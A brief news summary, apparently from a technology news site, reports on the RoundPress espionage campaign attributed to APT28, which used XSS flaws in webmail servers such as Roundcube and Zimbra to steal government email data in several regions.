<ul><li>A major cyber-espionage campaign called RoundPress, attributed to APT28 (Fancy Bear), utilized multiple zero-day and n-day vulnerabilities to eavesdrop on government email communications.</li><li>The campaign targeted victims in several countries across Eastern Europe, Africa, and Latin America, sending phishing emails containing malicious JavaScript code to steal email data.</li><li>The attackers exploited cross-site scripting (XSS) flaws in webmail servers to collect login credentials, email messages, contacts, 2FA information, and more, exfiltrating the data to a C2 address.</li><li>Government organizations, military entities, defense companies, and critical infrastructure firms were among the victims of this hacking campaign, which leveraged vulnerabilities in Roundcube, MDaemon, Horde, and Zimbra.</li></ul>

Global Russian hacking campaign steals data from government agencies

Discover more